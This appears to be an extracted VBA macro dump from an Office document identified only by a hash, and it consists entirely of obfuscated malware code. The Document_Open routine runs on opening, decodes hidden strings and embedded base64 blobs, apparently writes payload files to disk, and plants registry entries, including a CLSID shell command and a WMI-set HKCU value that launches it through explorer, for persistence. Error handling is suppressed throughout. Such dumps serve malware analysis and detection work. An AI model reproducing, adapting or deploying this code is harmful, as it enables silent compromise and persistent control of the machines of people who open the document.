Filename     : ./macros/5f2a6601d349af00a4cc101a638003af2f330879c333168cbf6a7a123dfb3928
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Option Explicit
Sub Document_Open()
    On Error Resume Next


    Dim hUbq, drSE, nsSh As String
    hUbq = cGkv(pTYH)
    drSE = cGkv(cCIO)
    nsSh = cGkv(mPAS)


    Dim nPks As String
    nPks = oZxP(rFdR(34, 113))
    nPks = pdBO(nPks, oZxP(rFdR(29, 126)))
    nPks = pdBO(nPks, oZxP(rFdR(124, 14)))
    nPks = pdBO(nPks, oZxP(rFdR(56, 81)))
    nPks = pdBO(nPks, oZxP(rFdR(28, 108)))
    nPks = pdBO(nPks, oZxP(rFdR(233, 157)))
    nPks = pdBO(nPks, oZxP(rFdR(56, 81)))
    nPks = pdBO(nPks, oZxP(rFdR(249, 151)))
    nPks = pdBO(nPks, oZxP(rFdR(160, 199)))
    nPks = pdBO(nPks, oZxP(rFdR(254, 208)))
    nPks = pdBO(nPks, oZxP(rFdR(130, 196)))
    nPks = pdBO(nPks, oZxP(rFdR(56, 81)))
    nPks = pdBO(nPks, oZxP(rFdR(68, 40)))
    nPks = pdBO(nPks, oZxP(rFdR(236, 137)))
    nPks = pdBO(nPks, oZxP(rFdR(34, 113)))
    nPks = pdBO(nPks, oZxP(rFdR(227, 154)))
    nPks = pdBO(nPks, oZxP(rFdR(214, 165)))
    nPks = pdBO(nPks, oZxP(rFdR(233, 157)))
    nPks = pdBO(nPks, oZxP(rFdR(236, 137)))
    nPks = pdBO(nPks, oZxP(rFdR(121, 20)))
    nPks = pdBO(nPks, oZxP(rFdR(231, 168)))
    nPks = pdBO(nPks, oZxP(rFdR(194, 160)))
    nPks = pdBO(nPks, oZxP(rFdR(114, 24)))
    nPks = pdBO(nPks, oZxP(rFdR(236, 137)))
    nPks = pdBO(nPks, oZxP(rFdR(29, 126)))
    nPks = pdBO(nPks, oZxP(rFdR(233, 157)))

    Dim ySxy As String
    ySxy = hUbq
    Dim pOyT As String
    pOyT = ""
    pOyT = pdBO(pOyT, oZxP(rFdR(8, 75)))
pOyT = pdBO(pOyT, oZxP(rFdR(121, 67)))
pOyT = pdBO(pOyT, "\")
pOyT = pdBO(pOyT, oZxP(rFdR(41, 121)))
pOyT = pdBO(pOyT, oZxP(rFdR(124, 14)))
pOyT = pdBO(pOyT, oZxP(rFdR(17, 126)))
pOyT = pdBO(pOyT, oZxP(rFdR(160, 199)))
pOyT = pdBO(pOyT, oZxP(rFdR(124, 14)))
pOyT = pdBO(pOyT, oZxP(rFdR(114, 19)))
pOyT = pdBO(pOyT, oZxP(rFdR(121, 20)))
pOyT = pdBO(pOyT, oZxP(rFdR(124, 56)))
pOyT = pdBO(pOyT, oZxP(rFdR(114, 19)))
pOyT = pdBO(pOyT, oZxP(rFdR(233, 157)))
pOyT = pdBO(pOyT, oZxP(rFdR(114, 19)))
pOyT = pdBO(pOyT, "\")
pOyT = pdBO(pOyT, oZxP(rFdR(198, 145)))
pOyT = pdBO(pOyT, oZxP(rFdR(56, 81)))
pOyT = pdBO(pOyT, oZxP(rFdR(249, 151)))
pOyT = pdBO(pOyT, oZxP(rFdR(202, 174)))
pOyT = pdBO(pOyT, oZxP(rFdR(17, 126)))
pOyT = pdBO(pOyT, oZxP(rFdR(198, 177)))
pOyT = pdBO(pOyT, oZxP(rFdR(214, 165)))
pOyT = pdBO(pOyT, oZxP(rFdR(124, 56)))
pOyT = pdBO(pOyT, oZxP(rFdR(236, 137)))
pOyT = pdBO(pOyT, oZxP(rFdR(25, 127)))
pOyT = pdBO(pOyT, oZxP(rFdR(236, 137)))
pOyT = pdBO(pOyT, oZxP(rFdR(249, 151)))
pOyT = pdBO(pOyT, oZxP(rFdR(202, 174)))
pOyT = pdBO(pOyT, oZxP(rFdR(236, 137)))
pOyT = pdBO(pOyT, oZxP(rFdR(124, 14)))
pOyT = pdBO(pOyT, oZxP(rFdR(240, 164)))
pOyT = pdBO(pOyT, oZxP(rFdR(114, 19)))
pOyT = pdBO(pOyT, oZxP(rFdR(214, 165)))
pOyT = pdBO(pOyT, oZxP(rFdR(41, 66)))
pOyT = pdBO(pOyT, oZxP(rFdR(254, 208)))
pOyT = pdBO(pOyT, oZxP(rFdR(56, 81)))
pOyT = pdBO(pOyT, oZxP(rFdR(249, 151)))
pOyT = pdBO(pOyT, oZxP(rFdR(56, 81)))

    Module1.ypzs pOyT, ySxy, nPks

    Dim PDKk As String
    PDKk = ""
    PDKk = pdBO(PDKk, oZxP(rFdR(8, 75)))
PDKk = pdBO(PDKk, oZxP(rFdR(121, 67)))
PDKk = pdBO(PDKk, "\")
PDKk = pdBO(PDKk, oZxP(rFdR(41, 121)))
PDKk = pdBO(PDKk, oZxP(rFdR(124, 14)))
PDKk = pdBO(PDKk, oZxP(rFdR(17, 126)))
PDKk = pdBO(PDKk, oZxP(rFdR(160, 199)))
PDKk = pdBO(PDKk, oZxP(rFdR(124, 14)))
PDKk = pdBO(PDKk, oZxP(rFdR(114, 19)))
PDKk = pdBO(PDKk, oZxP(rFdR(121, 20)))
PDKk = pdBO(PDKk, oZxP(rFdR(124, 56)))
PDKk = pdBO(PDKk, oZxP(rFdR(114, 19)))
PDKk = pdBO(PDKk, oZxP(rFdR(233, 157)))
PDKk = pdBO(PDKk, oZxP(rFdR(114, 19)))
PDKk = pdBO(PDKk, "\")
PDKk = pdBO(PDKk, oZxP(rFdR(198, 145)))
PDKk = pdBO(PDKk, oZxP(rFdR(56, 81)))
PDKk = pdBO(PDKk, oZxP(rFdR(249, 151)))
PDKk = pdBO(PDKk, oZxP(rFdR(202, 174)))
PDKk = pdBO(PDKk, oZxP(rFdR(17, 126)))
PDKk = pdBO(PDKk, oZxP(rFdR(198, 177)))
PDKk = pdBO(PDKk, oZxP(rFdR(214, 165)))
PDKk = pdBO(PDKk, oZxP(rFdR(124, 56)))
PDKk = pdBO(PDKk, oZxP(rFdR(236, 137)))
PDKk = pdBO(PDKk, oZxP(rFdR(25, 127)))
PDKk = pdBO(PDKk, oZxP(rFdR(236, 137)))
PDKk = pdBO(PDKk, oZxP(rFdR(249, 151)))
PDKk = pdBO(PDKk, oZxP(rFdR(202, 174)))
PDKk = pdBO(PDKk, oZxP(rFdR(236, 137)))
PDKk = pdBO(PDKk, oZxP(rFdR(124, 14)))
PDKk = pdBO(PDKk, oZxP(rFdR(240, 164)))
PDKk = pdBO(PDKk, oZxP(rFdR(114, 19)))
PDKk = pdBO(PDKk, oZxP(rFdR(214, 165)))
PDKk = pdBO(PDKk, oZxP(rFdR(41, 66)))
PDKk = pdBO(PDKk, oZxP(rFdR(254, 208)))
PDKk = pdBO(PDKk, oZxP(rFdR(228, 156)))
PDKk = pdBO(PDKk, oZxP(rFdR(121, 20)))
PDKk = pdBO(PDKk, oZxP(rFdR(68, 40)))


    Dim VEvj As String
    VEvj = drSE
    Module1.ypzs PDKk, VEvj, nPks

    Dim zRRJ As String
    zRRJ = ""
    zRRJ = pdBO(zRRJ, oZxP(rFdR(8, 75)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(121, 67)))
zRRJ = pdBO(zRRJ, "\")
zRRJ = pdBO(zRRJ, oZxP(rFdR(41, 121)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(17, 126)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(160, 199)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(121, 20)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
zRRJ = pdBO(zRRJ, "\")
zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 145)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(56, 81)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(202, 174)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(17, 126)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 177)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(25, 127)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(202, 174)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(240, 164)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(41, 66)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(254, 208)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(228, 156)))
zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))

    Module1.ypzs zRRJ, nsSh, nPks


    JXYf
End Sub



Function cGkv(hUbq) As String
  Dim zRRJ As String
  zRRJ = ""
  zRRJ = pdBO(zRRJ, oZxP(rFdR(85, 24)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(77, 21)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(85, 24)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(93, 17)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(76, 126)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(254, 208)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(231, 168)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(85, 24)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(17, 126)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(29, 126)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(123, 14)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(121, 20)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))

  Dim nPks As Object
  Set nPks = CreateObject(zRRJ)
  Dim ySxy As Object
  
  zRRJ = ""
  zRRJ = pdBO(zRRJ, oZxP(rFdR(194, 160)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(132, 178)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(41, 29)))
  Set ySxy = nPks.createElement(zRRJ)
  
  zRRJ = ""
  zRRJ = pdBO(zRRJ, oZxP(rFdR(194, 160)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(56, 81)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(254, 208)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(194, 160)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(132, 178)))
  zRRJ = pdBO(zRRJ, oZxP(rFdR(41, 29)))
  ySxy.dataType = zRRJ
  ySxy.Text = hUbq
  cGkv = StrConv(ySxy.nodeTypedValue, vbUnicode)

End Function


Function JXYf()
    Dim VEvj, YLaQ, RhAd, VPBu, bFna As String
    Dim zRRJ As String
    Dim rkqO As String
    
    VEvj = cGkv(NkWV)
    YLaQ = WDQV
    Dim QbxG As Object
    zRRJ = ""
    zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 145)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(29, 126)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(56, 81)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(28, 108)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(254, 208)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
    zRRJ = pdBO(zRRJ, "")
    zRRJ = pdBO(zRRJ, oZxP(rFdR(31, 119)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(68, 40)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(68, 40)))

    Set QbxG = CreateObject(zRRJ)
    zRRJ = ""
    zRRJ = pdBO(zRRJ, oZxP(rFdR(221, 149)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(126, 53)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(8, 75)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(155, 206)))
    zRRJ = pdBO(zRRJ, "\")
    zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(17, 126)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(25, 127)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(233, 157)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 177)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, "\")
    zRRJ = pdBO(zRRJ, oZxP(rFdR(8, 75)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(68, 40)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(114, 19)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
    zRRJ = pdBO(zRRJ, "\")
    zRRJ = pdBO(zRRJ, oZxP(rFdR(8, 75)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(93, 17)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(97, 40)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
    zRRJ = pdBO(zRRJ, "\")

    
    QbxG.RegWrite zRRJ & YLaQ & "\", ""
    QbxG.RegWrite zRRJ & YLaQ & "\Shell\", ""
    QbxG.RegWrite zRRJ & YLaQ & "\Shell\Manage\", ""
    QbxG.RegWrite zRRJ & YLaQ & "\Shell\Manage\command\", VEvj, "REG_SZ"

    zRRJ = ""
    zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 145)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(56, 81)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(202, 174)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(17, 126)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(198, 177)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 56)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(25, 127)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(249, 151)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(202, 174)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(34, 113)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(124, 14)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(228, 146)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(56, 81)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(29, 126)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(236, 137)))
    zRRJ = pdBO(zRRJ, oZxP(rFdR(214, 165)))
    
    bFna = "explorer shell:::"
    bFna = bFna & YLaQ
    rkqO = ""
    rkqO = pdBO(rkqO, oZxP(rFdR(198, 177)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 20)))
    rkqO = pdBO(rkqO, oZxP(rFdR(160, 199)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 20)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 67)))
    rkqO = pdBO(rkqO, "{")
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 20)))
    rkqO = pdBO(rkqO, oZxP(rFdR(28, 108)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(114, 19)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(93, 17)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(228, 146)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(68, 40)))
    rkqO = pdBO(rkqO, oZxP(rFdR(82, 111)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 20)))
    rkqO = pdBO(rkqO, oZxP(rFdR(28, 108)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(114, 19)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, "}")
    rkqO = pdBO(rkqO, "!")
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(254, 208)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(202, 174)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(25, 127)))
    rkqO = pdBO(rkqO, oZxP(rFdR(114, 19)))
    rkqO = pdBO(rkqO, oZxP(rFdR(123, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(68, 40)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(121, 67)))
    rkqO = pdBO(rkqO, oZxP(rFdR(34, 113)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(202, 174)))
    rkqO = pdBO(rkqO, oZxP(rFdR(117, 39)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(160, 199)))
    rkqO = pdBO(rkqO, oZxP(rFdR(41, 121)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(228, 146)))
    
    Set QbxG = GetObject(rkqO)
    rkqO = ""
    rkqO = pdBO(rkqO, oZxP(rFdR(34, 113)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(25, 127)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(198, 177)))
    rkqO = pdBO(rkqO, oZxP(rFdR(114, 19)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(85, 24)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(29, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(25, 127)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(198, 145)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(202, 174)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(198, 177)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(8, 75)))
    rkqO = pdBO(rkqO, oZxP(rFdR(123, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, oZxP(rFdR(233, 157)))
    rkqO = pdBO(rkqO, oZxP(rFdR(88, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(236, 137)))
    rkqO = pdBO(rkqO, oZxP(rFdR(124, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(214, 165)))
    rkqO = pdBO(rkqO, oZxP(rFdR(56, 81)))
    rkqO = pdBO(rkqO, oZxP(rFdR(17, 126)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    rkqO = pdBO(rkqO, "\")
    rkqO = pdBO(rkqO, oZxP(rFdR(117, 39)))
    rkqO = pdBO(rkqO, oZxP(rFdR(123, 14)))
    rkqO = pdBO(rkqO, oZxP(rFdR(249, 151)))
    
    QbxG.SetExpandedStringValue &H80000001, rkqO, zRRJ, bFna

End Function

Function pTYH() As String
    Dim hUbq As String
hUbq = ""
hUbq = hUbq & "LUZKK1FNMj9AMkNRMUFYMUctLDwqK1ZJLlhRL1VXLUJRMFJaMj9DMUI5MT1DLkVSMltaMUdEMElILDE0K1ZJMlg7MlMxMjpQMT1DLkBNLUJKMUcpMkQ8Mj8pMVsrMlg7MlMxMjpQLjtbMj4+MVsrMlg7MlMxMjpQLjtbL0FSMEk9LDE0K1ZJK1ZJLVErMzcpLT5WMUsrLTk1L1VHLThZMisuLSlPLTRaLT1MLFQpMUsvMCtPLEsxMz0qMi9SL0JIMkgzMDErLzQ/LC1VLEE3MDY6MyhAL0ZLLEFIMzMwMVRXLT5PM0VFLEE5LzNEMTJTM0VELT5FLEs5My46MENbMUc5LTQ4MDEuLCxHMipVMUdCLT1YMTI/MDY+MEREMTJULj9TLFlBLjVaMUZQL0JbLSlUMCxOMUFQMCwoLEFMMVpULT1FLTNVLjBZMUY2LFhaLS84Ly5QLEBZLEs9L0dOL0MqMzczMj8/Mjo4L0dCLS80LFUrMUE8Llk4MTg8MykpMk5BMzZPLlRIMEAqL1tOLC1SLTRbLT0/MlNELFUpLTlRLEE7L0ZPMUw6LEpYMzJBLk80MTgxLFA2MThHLko0Lzk6MipLMU9bLzxaMUc/L1tWMDYqMldQM0ZOMlJGLCxLMkhJMDo5LEE1LCxRM0ZDMVoxLFowMykwMzJILFlGMEU2LFU6Ly5OMzw1MkRS"
hUbq = hUbq & "My4oLEVPMkNWLykvLkA/MzgwLEtFLjVbMUE2L0FbLEFCMVo6LllLLTRTMT09L1FTLFRGMDpTLy5QLjIzLFRJMVpKL0I5M0ZSMTNLL1pYMk47MUFOL1pEMDFLMVY3MzdaMjBLMVYzLjE4MkQ5L0JYL1FYMyhQMVo2Lz46Mi9RMkRQLFQ+LzNFLFA8MDZKLzQ4LSpGMkQyLkpEMVA8L1tALTkzLTQ/Mlg2LEFLMzMtMjVML0MwLTk3MjU8L1FTMEUxM0VVL0dVMlNAMklNLTk5Lk8vMitUMzc0Lz41LkRLM0VLMVsoLkRQMjUzMy1MMTNLLSo2MjlEMDpWLlkrLk9QL0I0L0tRMkg3MzJKLyo8MVpbMy0tLS87Lzg+LzkzMTNAMVpAMykxMkkuMk45MitVMj8+MDpKLkVbLlNXMVA6Mkk1My4yLkRPMj9KMkRKLy5UMVE2MjU6LlhKLlRLLE9PMyguMjVRMk1FL1VWMEA+Mk4oMUY4L1E7L0c/LTlJLEpJL1BQLEpKLlQtMj9VMCwtLC4oMTdYLlkrM0FSMVEzMUFNL0M0MUw/Mj5DL0wyMD8uLllNMjRHMitEMjpYMzJEMy1XLEsvMj9AMkhALE9ALjpVMzw1MzZQMDVNM0BDM0FILTk1MzMsMj9DMCw7LEFILkBKLT5aLzM9Mj9QLTQtMisxLS9YLThDMVVNLy5N"
hUbq = hUbq & "LFouMy44MDBNMitFLEovMj5EMVlTLT5YLyo3LkUxM0FTMDBLMj89LjwuLz1OLTlPM0EzLC1HM0ZELjFOLz07LzNNMklEMERRLzkoMjBOLkBZLTAoMThJLFRLLT1XLEY9Ly5LMkQsMj9RLTkwLE8uMyhJMkM/Mkg3Mj9FM0EpL0MsL0JSMDA6MkhRLlk4LzM1My1EL1E9Lzk8L0cyLEpDLjcvMkRKL1VIL0MyLzk8Lk5JMTdCMDA6M0VELSsrMyhJMCtNLzNQLTRRMzI6MlguLEo3LjBbMTNEMjpHMUFMLz0pLS89LEZBMUZNLlRCL1tQMzc4M0ZTMkQrL0xZMVUpL1pJMUc6MDpTM0E2L1ZLMy1MM0EzMkQrL0JRLFU4L1pbLjs4LC07MzgxLlQ7Mj5WMjAqM0VbLkA1LTkzLzhNL0JaLkBLMD9BLTkvMjAvMDY3MVlUMj8rMzJVLkEsLkVPL1E8Mlg7My43LzQ6MTNML1E0MVE+LFopLFhaMVEoMitPLC00LEpTMzgwMk43L1ZKMDpJMjRZMztTLEpXMVYxMlczMzdQMEAwLlg+Mkg+MjU2MjlJLk9PMUtGM0EyLkpPLlhLMTM/MTJCMThOLy9FMCtBMDZHMzcyLFlJMVAoMTdPMDU8MzdOM0ZJLEU2L0xPMDo2MjorM0EpMjUqMCtQLEA7MUs9MUJKLjZTLjc1"
